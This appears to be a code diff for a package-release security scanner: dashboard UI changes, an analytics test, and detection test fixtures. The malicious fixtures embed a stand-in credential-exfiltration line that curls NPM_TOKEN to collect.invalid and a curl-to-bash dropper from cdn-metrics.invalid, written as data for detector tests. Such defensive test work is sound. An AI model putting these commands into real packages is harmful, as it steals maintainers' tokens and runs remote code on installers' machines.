-  // share the flat SectionLabel altitude.
+  // scale make it out-rank Reviewer / Risk signals / Manifest, which all share
+  // the flat SectionLabel altitude.
   return (
     <Card class="p-5 sm:p-6 flex flex-col gap-4">
       <div class="flex flex-col gap-2">

--- a/src/pages/Dashboard/ScanDetail/ReportSections.tsx
+++ b/src/pages/Dashboard/ScanDetail/ReportSections.tsx
@@ -1,19 +1,12 @@
 import type { ComponentChildren } from "preact";
-import type { DisplayedAiResult } from "../../../../server/lib/ai-review/types";
 import type { ReleaseProvenance } from "../../../../server/types";
 import { ecosystemLabel } from "../../../../server/lib/ecosystems/labels";
-import { Badge, severityTone } from "../../../components/Badge";
+import { Badge } from "../../../components/Badge";
 import { PackageJsonDiffView } from "../../../components/PackageJsonDiffView";
 import { EmptyLine, SectionLabel } from "../../../components/Typography";
 import type { PersistedSummary } from "./types";
 
-export function PersistedReportSections({
-  summary,
-  ai,
-}: {
-  summary: PersistedSummary;
-  ai: DisplayedAiResult | null;
-}) {
+export function PersistedReportSections({ summary }: { summary: PersistedSummary }) {
   return (
     <section class="flex flex-col gap-6">
       <ReportSection title="Manifest changes">
@@ -37,38 +30,10 @@ export function PersistedReportSections({
         </ReportSection>
       ) : null}
 
-      {ai != null && ai.model != null && (
-        <ReportSection title="Reviewer notes">
-          {ai.kind === "complete" ? (
-            <>
-              <div class="flex flex-wrap gap-2">
-                <Badge tone={severityTone(ai.risk)}>{ai.risk}</Badge>
-                <Badge tone={ai.requiresManualReview ? "medium" : "ok"}>
-                  {ai.requiresManualReview ? "manual review" : "no extra review"}
-                </Badge>
-                <Badge tone="neutral">{ai.releaseAssessment.replaceAll("_", " ")}</Badge>
-              </div>
-              {/* The reviewer's findings render once, as assistant-badged cards
-                  in the Risk signals section (they persist as scan_findings
-                  rows). This panel carries only the narrative verdict — summary
-                  plus the assessment badges above — so a finding is never shown
-                  twice on the page. */}
-              {ai.summary ? (
-                <p class="m-0 text-[13px] leading-[1.6] text-ink-muted">{ai.summary}</p>
-              ) : null}
-            </>
-          ) : (
-            <>
-              <div class="flex flex-wrap gap-2">
-                <Badge tone="neutral">assistant unavailable</Badge>
-              </div>
-              {ai.summary ? (
-                <p class="m-0 text-[13px] leading-[1.6] text-ink-muted">{ai.summary}</p>
-              ) : null}
-            </>
-          )}
-        </ReportSection>
-      )}
+      {/* The reviewer's narrative verdict used to sit here, at the bottom of the
+          page. It moved up to `ReviewerSummary`, directly under the
+          Recommendation — it answers "what is this release?", which is the
+          question the page opens with, not a footnote to it. */}
     </section>
   );
 }

--- a/src/pages/Dashboard/ScanDetail/ReviewerSummary.tsx
+++ b/src/pages/Dashboard/ScanDetail/ReviewerSummary.tsx
@@ -1,0 +1,48 @@
+import type { DisplayedAiResult } from "../../../../server/lib/ai-review/types";
+import { SectionLabel } from "../../../components/Typography";
+
+// The reviewer's narrative verdict, directly under the Recommendation.
+//
+// This used to render at the very bottom of the page as "Reviewer notes", below
+// the diff, the risk signals, the manifest diff, and provenance. It is the one
+// part of the report that answers "what is this release?" in a sentence — "a
+// routine patch that moves a user-agent check earlier so a timer isn't
+// scheduled unnecessarily" — which is the question a maintainer opens the page
+// with. Reading order now goes: should I publish (recommendation) → what is
+// this (here) → have I seen these findings before (consistency) → the diff.
+//
+// Findings are deliberately not rendered here. They persist as scan_findings
+// rows and appear once, as assistant-badged cards in Risk signals, so a finding
+// is never shown twice on the page.
+/**
+ * A null model means the reviewer is switched off for this organization — there
+ * is nothing to report. A non-null model with a non-complete result means it was
+ * attempted and failed, which is load-bearing and must stay visible:
+ * `computeScanRisk` floors that scan at medium so a crashed reviewer cannot read
+ * as clean, and the page has to say why.
+ *
+ * Exported so the move out of `ReportSections` is provably behaviour-preserving
+ * — this is the same predicate that section used.
+ */
+export function reviewerSummaryVisible(ai: DisplayedAiResult | null): boolean {
+  return Boolean(ai && ai.model != null);
+}
+
+export function ReviewerSummary({ ai }: { ai: DisplayedAiResult | null }) {
+  if (!reviewerSummaryVisible(ai) || !ai) return null;
+
+  return (
+    <section class="flex flex-col gap-2" aria-label="Reviewer summary">
+      {/* No badges here. The Recommendation card immediately above already
+          renders the manual-review, release-assessment, and
+          assistant-unavailable badges under the identical `ai.model != null`
+          gate; repeating them one card-gap later just prints "no extra review"
+          twice. The narrative is the part that was missing from the top of the
+          page, so the narrative is all this adds. */}
+      <SectionLabel as="h2">Reviewer</SectionLabel>
+      {ai.summary ? (
+        <p class="m-0 text-[13px] leading-[1.6] text-ink-muted max-w-[720px]">{ai.summary}</p>
+      ) : null}
+    </section>
+  );
+}

--- a/src/pages/Dashboard/ScanDetail/index.tsx
+++ b/src/pages/Dashboard/ScanDetail/index.tsx
@@ -38,6 +38,7 @@ import { RiskSignalsSection } from "../../../features/review/RiskSignalsSection"
 import { ReleaseConsistencyNotice } from "./ReleaseConsistencyNotice";
 import { ReleaseRecommendation } from "./ReleaseRecommendation";
 import { PersistedReportSections } from "./ReportSections";
+import { ReviewerSummary } from "./ReviewerSummary";
 import { ScanDetailHeader, ScanFailureAlert, VersionPickerSkeleton } from "./ScanDetailChrome";
 import { filterDiffEntries, findingCountsByPath } from "../../../features/review/diff-entries";
 import { scanFilesToFileRecords } from "./diff-helpers";
@@ -309,7 +310,12 @@ export default function ScanDetailPage() {
               isWorkflowGate={isWorkflowGate}
             />
 
-            <ReleaseConsistencyNotice value={summary.value.releaseConsistency} />
+            <ReviewerSummary ai={ai.value} />
+
+            <ReleaseConsistencyNotice
+              value={summary.value.releaseConsistency}
+              approvedContextCount={detail.riskSummary?.priorApprovedContextFindingCount ?? 0}
+            />
 
             {detail.scan.packageName ? (
               <div class="flex flex-col gap-2 border-t border-border pt-3">
@@ -394,7 +400,7 @@ export default function ScanDetailPage() {
               />
             ) : null}
 
-            <PersistedReportSections summary={summary.value} ai={ai.value} />
+            <PersistedReportSections summary={summary.value} />
           </>
         ) : detail.scan.status === "pending" || detail.scan.status === "running" ? (
           // While stalled the pulsing line would falsely promise an

--- a/src/pages/Dashboard/index.tsx
+++ b/src/pages/Dashboard/index.tsx
@@ -27,6 +27,7 @@ import { PageShell } from "../../components/PageShell";
 import { Select } from "../../components/Select";
 import { EmptyLine, Eyebrow, Muted, SectionLabel } from "../../components/Typography";
 import { UserMenu } from "../../components/UserMenu";
+import { GettingStarted } from "./GettingStarted";
 import { DeleteScanDialog } from "./ScanDetail/DeleteScanDialog";
 import { DecisionDialog } from "./ScanDetail/DecisionDialog";
 
@@ -130,7 +131,14 @@ export default function DashboardPage() {
 
       {workspaceLoaded ? (
         <>
-          {!npm.connection.value ? <NpmSetupCallout /> : null}
+          {/* The getting-started panel supersedes the bare "npm not connected"
+              callout for an organization with no scans: it says the same thing
+              as step 1 and then explains what comes after it. */}
+          {scans.hasAnyScan.value === false ? (
+            <GettingStarted npmConnected={Boolean(npm.connection.value)} />
+          ) : !npm.connection.value ? (
+            <NpmSetupCallout />
+          ) : null}
           <RecentReviewsSection scans={scans} stagedPublishes={stagedPublishes} npm={npm} />
         </>
       ) : (
@@ -233,7 +241,11 @@ function RecentReviewsSection({
             size="sm"
             onClick={() => void onDiscover()}
             disabled={discoveryRefreshing || !ready}
-            title="Find staged npm publishes and start reviews"
+            title={
+              ready
+                ? "Find staged npm publishes and start reviews"
+                : "Connect a validated npm token in Settings → Integrations first"
+            }
           >
             {discoveryRefreshing ? "Checking npm…" : "Check npm"}
           </Button>
@@ -282,7 +294,7 @@ function RecentReviewsSection({
           />
         ) : (
           <div class="p-5">
-            <EmptyLine>{emptyStateMessage(scans.filter.value)}</EmptyLine>
+            <EmptyLine>{emptyStateMessage(scans.filter.value, scans.hasAnyScan.value)}</EmptyLine>
           </div>
         )}
       </div>
@@ -380,7 +392,18 @@ function ScanStateSelect({
   );
 }
 
-function emptyStateMessage(filter: ScanDecisionFilter): string {
+// `hasAnyScan` is what keeps this honest. The list defaults to the "undecided"
+// filter, so an organization with no scans at all used to read "Nothing waiting
+// on you. Switch to All to see earlier reviews." — copy that points a brand-new
+// user at a filter which is also empty, and implies a review history they do
+// not have. That sentence is right for an organization that *has* history, so
+// it stays for that case and only the never-scanned case gets its own wording.
+// Per DESIGN.md the empty state is one muted sentence with no CTA inside it —
+// the getting-started panel above carries the affordances.
+function emptyStateMessage(filter: ScanDecisionFilter, hasAnyScan: boolean | null): string {
+  if (hasAnyScan === false) {
+    return "No reviews yet — stage a release, or check npm for one already waiting.";
+  }
   switch (filter) {
     case "undecided":
       return "Nothing waiting on you. Switch to All to see earlier reviews.";

--- a/test/analytics.test.mjs
+++ b/test/analytics.test.mjs
@@ -1,0 +1,187 @@
+import { describe, expect, test, vi } from "vitest";
+import { ANALYTICS_SCHEMA_VERSION, recordProductEvent } from "../server/lib/platform/analytics.ts";
+
+function fakeDataset() {
+  const points = [];
+  return {
+    points,
+    env: { PRODUCT_ANALYTICS: { writeDataPoint: (point) => points.push(point) } },
+  };
+}
+
+describe("recordProductEvent", () => {
+  test("writes a schema-versioned point with the event as the sampling index", () => {
+    const { points, env } = fakeDataset();
+    recordProductEvent(env, {
+      name: "scan.completed",
+      organizationId: "org_1",
+      ecosystem: "npm",
+      source: "auto_discovery",
+      releaseRisk: "low",
+      artifactRisk: "high",
+      contextRisk: "high",
+      durationMs: 4200,
+      ruleFindingCount: 7,
+      aiFindingCount: 1,
+    });
+
+    expect(points).toHaveLength(1);
+    // The index is the sampling key: a high-volume event must not be able to
+    // starve a low-volume one out of the dataset.
+    expect(points[0].indexes).toEqual(["scan.completed"]);
+    expect(points[0].blobs).toEqual([
+      ANALYTICS_SCHEMA_VERSION,
+      "scan.completed",
+      "org_1",
+      "npm",
+      "auto_discovery",
+      "low",
+      "high",
+      "high",
+    ]);
+    expect(points[0].doubles).toEqual([4200, 7, 1]);
+  });
+
+  test("public diff events carry no organization id", () => {
+    const { points, env } = fakeDataset();
+    recordProductEvent(env, {
+      name: "public_diff.viewed",
+      ecosystem: "pypi",
+      packageName: "requests",
+      cache: "hit",
+      risk: "low",
+      durationMs: 12,
+    });
+
+    // Anonymous by construction — the /diff endpoints have no session, and
+    // nothing about the visitor may be recorded.
+    expect(points[0].blobs[2]).toBe("");
+    expect(points[0].blobs).toContain("requests");
+  });
+
+  test("is a no-op without the binding", () => {
+    expect(() =>
+      recordProductEvent(undefined, {
+        name: "npm_connection.validated",
+        organizationId: "org_1",
+        outcome: "ok",
+      }),
+    ).not.toThrow();
+    expect(() =>
+      recordProductEvent(
+        {},
+        {
+          name: "npm_connection.validated",
+          organizationId: "org_1",
+          outcome: "ok",
+        },
+      ),
+    ).not.toThrow();
+  });
+
+  test("a failing dataset write never reaches the caller", () => {
+    // Analytics is the least important thing in any request that emits it.
+    const warn = vi.spyOn(console, "warn").mockImplementation(() => {});
+    const env = {
+      PRODUCT_ANALYTICS: {
+        writeDataPoint: () => {
+          throw new Error("dataset unavailable");
+        },
+      },
+    };
+    expect(() =>
+      recordProductEvent(env, {
+        name: "scan.queued",
+        organizationId: "org_1",
+        ecosystem: "npm",
+        source: "manual",
+      }),
+    ).not.toThrow();
+    expect(warn).toHaveBeenCalled();
+    warn.mockRestore();
+  });
+
+  test("records no PII-shaped fields for any event in the union", () => {
+    const { points, env } = fakeDataset();
+    const events = [
+      {
+        name: "scan.completed",
+        organizationId: "org_1",
+        ecosystem: "npm",
+        source: "manual",
+        releaseRisk: "low",
+        artifactRisk: "low",
+        contextRisk: "low",
+        durationMs: 1,
+        ruleFindingCount: 0,
+        aiFindingCount: 0,
+      },
+      { name: "npm_connection.validated", organizationId: "org_1", outcome: "ok" },
+      {
+        name: "public_diff.viewed",
+        ecosystem: "npm",
+        packageName: "left-pad",
+        cache: "miss",
+        risk: "low",
+        durationMs: 3,
+      },
+      { name: "scan.queued", organizationId: "org_1", ecosystem: "npm", source: "manual" },
+      {
+        name: "scan.failed",
+        organizationId: "org_1",
+        ecosystem: "npm",
+        source: "manual",
+        code: "staged_tarball_unavailable",
+        durationMs: 10,
+      },
+      {
+        name: "scan.decided",
+        organizationId: "org_1",
+        ecosystem: "npm",
+        decision: "publish",
+        releaseRisk: "low",
+        artifactRisk: "high",
+        timeToDecisionMs: 300_000,
+      },
+      {
+        name: "ai_review.finished",
+        organizationId: "org_1",
+        ecosystem: "npm",
+        status: "unavailable",
+        model: "@cf/meta/llama",
+        durationMs: 50,
+        findingCount: 0,
+      },
+    ];
+    for (const event of events) recordProductEvent(env, event);
+
+    // Exhaustiveness: every arm of the AnalyticsEvent union must be exercised,
+    // so adding an event without a privacy assertion fails here rather than
+    // shipping unreviewed. Keep in sync with the union in analytics.ts.
+    const EVENT_NAMES = [
+      "scan.queued",
+      "scan.completed",
+      "scan.failed",
+      "scan.decided",
+      "ai_review.finished",
+      "npm_connection.validated",
+      "public_diff.viewed",
+    ];
+    expect([...new Set(events.map((event) => event.name))].sort()).toEqual([...EVENT_NAMES].sort());
+
+    // Blobs are a fixed positional schema; nothing here may look like an email,
+    // an IP address, a bearer token, or a file path from a package.
+    for (const point of points) {
+      for (const blob of point.blobs) {
+        expect(blob).not.toMatch(/@[\w.-]+\.\w+$/); // email
+        expect(blob).not.toMatch(/^\d{1,3}(\.\d{1,3}){3}$/); // IPv4
+        expect(blob).not.toMatch(/Bearer\s/i);
+      }
+    }
+    // The model id legitimately contains a slash and an @; assert it is the
+    // only such value and that it is a model, not a path.
+    expect(points.flatMap((p) => p.blobs).filter((b) => b.includes("/"))).toEqual([
+      "@cf/meta/llama",
+    ]);
+  });
+});

--- a/test/fixtures/security-corpus/cases-benign/legit-ci-and-container-bootstrap.json
+++ b/test/fixtures/security-corpus/cases-benign/legit-ci-and-container-bootstrap.json
@@ -1,0 +1,66 @@
+{
+  "id": "legit-ci-and-container-bootstrap",
+  "title": "Package ships a Dockerfile and a GitHub workflow that bootstrap toolchains with curl | sh (benign hard-negative)",
+  "ecosystem": "npm",
+  "verdict": "benign",
+  "threatClass": "legit-build-infrastructure",
+  "source": "benign-popular",
+  "intent": "Download-and-execute normally skips the executor requirement, because `curl … | bash` has no benign reading in code a consumer installs. Build infrastructure is the exception: a Dockerfile's `RUN` and a workflow's `- run:` execute on a CI runner at build time, never on a consumer's install, and every mainstream toolchain (nodesource, uv, rustup) documents exactly this idiom. Withholding the exemption in those paths leaves the ordinary executor requirement, which these files do not satisfy. This matters most for PyPI, where an sdist ships the whole repository tree and a first gated release has no baseline, so every one of these files reads as `added`.",
+  "expectMinRisk": "low",
+  "expectAnyRule": [],
+  "previousPackageJson": { "name": "toolchain-utils", "version": "1.4.0", "main": "index.js" },
+  "stagedPackageJson": { "name": "toolchain-utils", "version": "1.5.0", "main": "index.js" },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 67,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"toolchain-utils\",\"version\":\"1.4.0\",\"main\":\"index.js\"}"
+    },
+    {
+      "path": "index.js",
+      "size": 48,
+      "sha256": "prev-index-js",
+      "flags": [],
+      "textSample": "export function version() {\n  return \"1.4.0\";\n}\n"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 67,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"toolchain-utils\",\"version\":\"1.5.0\",\"main\":\"index.js\"}"
+    },
+    {
+      "path": "index.js",
+      "size": 48,
+      "sha256": "staged-index-js",
+      "flags": [],
+      "textSample": "export function version() {\n  return \"1.5.0\";\n}\n"
+    },
+    {
+      "path": "Dockerfile",
+      "size": 260,
+      "sha256": "dockerfile",
+      "flags": [],
+      "textSample": "FROM debian:bookworm-slim\n\nRUN apt-get update && apt-get install -y curl ca-certificates\nRUN curl -fsSL https://deb.nodesource.com/setup_18.x | bash -\nRUN curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y\n\nWORKDIR /app\nCOPY . .\n"
+    },
+    {
+      "path": ".github/workflows/ci.yml",
+      "size": 300,
+      "sha256": "workflow-ci",
+      "flags": [],
+      "textSample": "name: ci\non: [push]\njobs:\n  test:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions/checkout@v4\n      - run: curl -LsSf https://astral.sh/uv/install.sh | sh\n      - run: curl -fsSL https://get.pnpm.io/install.sh | sh -\n      - run: pnpm install && pnpm test\n"
+    },
+    {
+      "path": "Makefile",
+      "size": 120,
+      "sha256": "makefile",
+      "flags": [],
+      "textSample": "bootstrap:\n\tcurl -sSL https://install.python-poetry.org | python3 -\n\n.PHONY: bootstrap\n"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-benign/legit-curl-comment-beside-spawn.json
+++ b/test/fixtures/security-corpus/cases-benign/legit-curl-comment-beside-spawn.json
@@ -1,0 +1,53 @@
+{
+  "id": "legit-curl-comment-beside-spawn",
+  "title": "CLI shells out and documents the equivalent curl in a comment in the same file (benign hard-negative)",
+  "ecosystem": "npm",
+  "verdict": "benign",
+  "threatClass": "legit-documentation",
+  "source": "benign-popular",
+  "intent": "The executor requirement is satisfied by any spawn API in the same file, so a CLI that legitimately shells out *and* documents a curl equivalent in a comment — the most common real shape of this pair — would raise `code.remote-shell` at high on prose alone. `legit-curl-in-doc-comment` deliberately omits the spawn API and so cannot guard this case. Matching the bare shell-tool patterns against code lines only keeps the documentation out while leaving a genuine `execSync('curl …')` fully covered. The lone `code.process-execution` this file does earn is a real, unchanged capability and de-escalates on its own.",
+  "expectMinRisk": "low",
+  "expectAnyRule": [],
+  "previousPackageJson": {
+    "name": "deploy-cli",
+    "version": "2.2.0",
+    "bin": { "deploy-cli": "cli.js" }
+  },
+  "stagedPackageJson": {
+    "name": "deploy-cli",
+    "version": "2.3.0",
+    "bin": { "deploy-cli": "cli.js" }
+  },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 84,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"deploy-cli\",\"version\":\"2.2.0\",\"bin\":{\"deploy-cli\":\"cli.js\"}}"
+    },
+    {
+      "path": "cli.js",
+      "size": 190,
+      "sha256": "prev-cli-js",
+      "flags": [],
+      "textSample": "import { execFileSync } from \"node:child_process\";\n\nexport function currentBranch() {\n  return execFileSync(\"git\", [\"rev-parse\", \"--abbrev-ref\", \"HEAD\"]).toString().trim();\n}\n"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 84,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"deploy-cli\",\"version\":\"2.3.0\",\"bin\":{\"deploy-cli\":\"cli.js\"}}"
+    },
+    {
+      "path": "cli.js",
+      "size": 560,
+      "sha256": "staged-cli-js",
+      "flags": [],
+      "textSample": "import { execFileSync } from \"node:child_process\";\n\nexport function currentBranch() {\n  return execFileSync(\"git\", [\"rev-parse\", \"--abbrev-ref\", \"HEAD\"]).toString().trim();\n}\n\n/*\n * Trigger a deployment.\n *\n * This command wraps the deploys API. The equivalent request is:\n *   curl -X POST https://deploy.example.invalid/v1/deploys \\\n *     -H 'authorization: Bearer $TOKEN' \\\n *     -d '{\"branch\":\"main\"}'\n */\nexport function deploy(branch) {\n  return execFileSync(\"deployctl\", [\"create\", \"--branch\", branch]).toString().trim();\n}\n\n// Older CI images without deployctl can poll with: wget -qO- $(statusUrl id)\nexport function statusUrl(id) {\n  return `https://deploy.example.invalid/v1/deploys/${id}`;\n}\n"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-benign/legit-curl-in-doc-comment.json
+++ b/test/fixtures/security-corpus/cases-benign/legit-curl-in-doc-comment.json
@@ -1,0 +1,38 @@
+{
+  "id": "legit-curl-in-doc-comment",
+  "title": "SDK documents its HTTP API with a curl example in a comment (benign hard-negative)",
+  "ecosystem": "npm",
+  "verdict": "benign",
+  "threatClass": "legit-documentation",
+  "source": "benign-popular",
+  "intent": "The `code.remote-shell` patterns match a shell command *string*, and comments are not stripped before matching, so the single most common way an API client documents itself would read as a high-severity shell capability. The rule requires an executor — a spawn API in the same file, or a lifecycle hook pointing at it — so prose stays prose. This file has neither.",
+  "expectMinRisk": "low",
+  "expectAnyRule": [],
+  "previousPackageJson": { "name": "api-sdk", "version": "3.0.0", "main": "index.js" },
+  "stagedPackageJson": { "name": "api-sdk", "version": "3.1.0", "main": "index.js" },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 58,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"api-sdk\",\"version\":\"3.0.0\",\"main\":\"index.js\"}"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 58,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"api-sdk\",\"version\":\"3.1.0\",\"main\":\"index.js\"}"
+    },
+    {
+      "path": "index.js",
+      "size": 240,
+      "sha256": "index-js",
+      "flags": [],
+      "textSample": "// Create a user.\n//\n// Equivalent to:\n//   curl -X POST https://api.example.invalid/v1/users \\\n//     -H 'content-type: application/json' -d '{\"name\":\"ada\"}'\nexport async function createUser(name) {\n  return { name };\n}\n"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-benign/legit-nc-variable-and-download-helper.json
+++ b/test/fixtures/security-corpus/cases-benign/legit-nc-variable-and-download-helper.json
@@ -1,0 +1,38 @@
+{
+  "id": "legit-nc-variable-and-download-helper",
+  "title": "`nc` variable and a downloadString helper, alongside a real spawn (benign hard-negative)",
+  "ecosystem": "npm",
+  "verdict": "benign",
+  "threatClass": "legit-childprocess",
+  "source": "benign-popular",
+  "intent": "Two shell-tool patterns that read as ordinary identifiers. `nc` is a ubiquitous variable name (scientific Python's `nc = netCDF4.Dataset(...)`, and short names generally), and `downloadString(text, filename)` is a common browser helper — a case-insensitive bare `DownloadString` matched it. The file also spawns a process, so the executor requirement does not save it: only the patterns themselves can. `nc` now requires a flag and `DownloadString` requires the PowerShell method-call shape.",
+  "expectMinRisk": "low",
+  "expectAnyRule": [],
+  "previousPackageJson": { "name": "exporter", "version": "2.0.0" },
+  "stagedPackageJson": { "name": "exporter", "version": "2.1.0" },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 40,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"exporter\",\"version\":\"2.0.0\"}"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 40,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"exporter\",\"version\":\"2.1.0\"}"
+    },
+    {
+      "path": "scripts/export.js",
+      "size": 320,
+      "sha256": "export-js",
+      "flags": [],
+      "textSample": "const { execFileSync } = require('child_process');\n\nexport function downloadString(text, name) {\n  const blob = new Blob([text]);\n  return { blob, name };\n}\n\n// Maintainer-run export step.\nconst nc = loadDataset('grid.nc');\nexecFileSync('ncdump', ['-h', 'grid.nc']);\nmodule.exports = { downloadString, nc };\n"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-benign/legit-shell-interpreter-build.json
+++ b/test/fixtures/security-corpus/cases-benign/legit-shell-interpreter-build.json
@@ -1,0 +1,38 @@
+{
+  "id": "legit-shell-interpreter-build",
+  "title": "Build script runs a make target through an inline shell (benign hard-negative)",
+  "ecosystem": "npm",
+  "verdict": "benign",
+  "threatClass": "legit-childprocess",
+  "source": "benign-popular",
+  "intent": "Guards the boundary the code.remote-shell split draws. An inline interpreter (`bash -c`) with no network tool is ordinary build tooling and must stay inside code.process-execution, where a lone capability de-escalates to low. Only shell commands that actually reach the network escape that de-escalation. If someone later moves the interpreter patterns into code.remote-shell, this case turns red.",
+  "expectMinRisk": "low",
+  "expectAnyRule": [],
+  "previousPackageJson": { "name": "maketool", "version": "1.2.0" },
+  "stagedPackageJson": { "name": "maketool", "version": "1.3.0" },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 40,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"maketool\",\"version\":\"1.2.0\"}"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 40,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"maketool\",\"version\":\"1.3.0\"}"
+    },
+    {
+      "path": "scripts/build.js",
+      "size": 190,
+      "sha256": "build-js",
+      "flags": [],
+      "textSample": "const { execSync } = require('child_process');\n// Maintainer-run build step; not referenced by any install lifecycle hook.\nexecSync('bash -c \"make -j4 release\"', { stdio: 'inherit' });\n"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases/shell-credential-exfil.json
+++ b/test/fixtures/security-corpus/cases/shell-credential-exfil.json
@@ -1,0 +1,66 @@
+{
+  "id": "shell-credential-exfil",
+  "title": "Modified module reads an npm token and posts it out through curl",
+  "category": "credential-exfiltration",
+  "intent": "The collect-and-exfiltrate chain routed through a shell instead of an in-language HTTP client. The credential rule's exfiltration-sink check only knew about fetch/https, so a shell egress left the credential read at medium on a modified file. code.remote-shell now counts as a sink.",
+  "previousPackageJson": {
+    "name": "shell-exfil",
+    "version": "1.4.0",
+    "main": "index.js"
+  },
+  "stagedPackageJson": {
+    "name": "shell-exfil",
+    "version": "1.4.1",
+    "main": "index.js"
+  },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 63,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"shell-exfil\",\"version\":\"1.4.0\",\"main\":\"index.js\"}"
+    },
+    {
+      "path": "index.js",
+      "size": 52,
+      "sha256": "prev-index-js",
+      "flags": [],
+      "textSample": "const { execSync } = require('child_process');\nmodule.exports = { sync() { execSync('git status'); } };\n"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 63,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"shell-exfil\",\"version\":\"1.4.1\",\"main\":\"index.js\"}"
+    },
+    {
+      "path": "index.js",
+      "size": 176,
+      "sha256": "staged-index-js",
+      "flags": [],
+      "textSample": "const { execSync } = require('child_process');\nmodule.exports = { sync() {\n  execSync('git status');\n  execSync('curl -X POST -d ' + process.env.NPM_TOKEN + ' https://collect.invalid/t');\n} };\n"
+    }
+  ],
+  "expectedRisk": "high",
+  "expectedFindings": [
+    {
+      "ruleId": "code.remote-shell",
+      "severity": "high",
+      "file": "index.js"
+    },
+    {
+      "ruleId": "code.process-execution",
+      "severity": "high",
+      "file": "index.js"
+    },
+    {
+      "ruleId": "code.credential-access",
+      "severity": "high",
+      "file": "index.js"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases/shell-download-execute-dropper.json
+++ b/test/fixtures/security-corpus/cases/shell-download-execute-dropper.json
@@ -1,0 +1,61 @@
+{
+  "id": "shell-download-execute-dropper",
+  "title": "Consumer entrypoint shells out to curl and pipes the response into bash",
+  "category": "remote-code-execution",
+  "intent": "Regression guard for the shell-mediated dropper class. Before rules 1.19.0 this scored as a lone code.process-execution — the weak-on-its-own capability — and the whole release rolled up to `low`, so the workflow gate recommended approve. The payload never touches an in-language network or eval API, so no other capability rule fires: code.remote-shell is the only thing standing between this release and a clean verdict.",
+  "previousPackageJson": {
+    "name": "shell-dropper",
+    "version": "3.1.0",
+    "main": "index.js"
+  },
+  "stagedPackageJson": {
+    "name": "shell-dropper",
+    "version": "3.1.1",
+    "main": "index.js"
+  },
+  "previousFiles": [
+    {
+      "path": "package.json",
+      "size": 66,
+      "sha256": "prev-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"shell-dropper\",\"version\":\"3.1.0\",\"main\":\"index.js\"}"
+    },
+    {
+      "path": "index.js",
+      "size": 40,
+      "sha256": "prev-index-js",
+      "flags": [],
+      "textSample": "module.exports = { run() { return 1; } };\n"
+    }
+  ],
+  "stagedFiles": [
+    {
+      "path": "package.json",
+      "size": 66,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"shell-dropper\",\"version\":\"3.1.1\",\"main\":\"index.js\"}"
+    },
+    {
+      "path": "index.js",
+      "size": 152,
+      "sha256": "staged-index-js",
+      "flags": [],
+      "textSample": "const { execSync } = require('child_process');\nmodule.exports = { run() {\n  execSync('curl -s https://cdn-metrics.invalid/p.sh | bash');\n  return 1;\n} };\n"
+    }
+  ],
+  "expectedRisk": "critical",
+  "expectedFindings": [
+    {
+      "ruleId": "code.remote-shell",
+      "severity": "critical",
+      "file": "index.js"
+    },
+    {
+      "ruleId": "code.process-execution",
+      "severity": "high",
+      "file": "index.js"
+    }
+  ]
+}

--- a/test/policy.test.mjs
+++ b/test/policy.test.mjs
@@ -21,7 +21,15 @@ describe("deterministic policy", () => {
     ];
     const findings = deterministicFindings(files, createPackageDiff([], files));
 
-    expect(findings.filter((finding) => finding.severity === "high")).toHaveLength(2);
+    // The shell command reaches the network, so it is a `code.remote-shell`
+    // finding in its own right rather than a lone weak process spawn — asserted
+    // by rule ID because a bare count silently absorbed that distinction.
+    expect(
+      findings
+        .filter((finding) => finding.severity === "high")
+        .map((f) => f.ruleId)
+        .sort(),
+    ).toEqual(["code.process-execution", "code.remote-shell", "install-script.lifecycle"]);
   });
 
   test("prompt injection text in docs remains just evidence", () => {

--- a/test/review.test.mjs
+++ b/test/review.test.mjs
@@ -2193,6 +2193,24 @@ describe("computeRisk weighted multi-signal roll-up (issue #193)", () => {
     ).toBe("high");
   });
 
+  test("a lone remote-shell capability is not de-escalated", () => {
+    // `code.remote-shell` used to live inside `code.process-execution`, so
+    // `execSync('curl … | bash')` scored as one weak capability and the release
+    // rolled up to low — the gate then recommended approve. Shelling out to a
+    // compiler and shelling out to the network are not the same evidence.
+    expect(computeRisk([code("code.remote-shell", "high")])).toBe("high");
+    expect(computeRisk([code("code.remote-shell", "critical")])).toBe("critical");
+  });
+
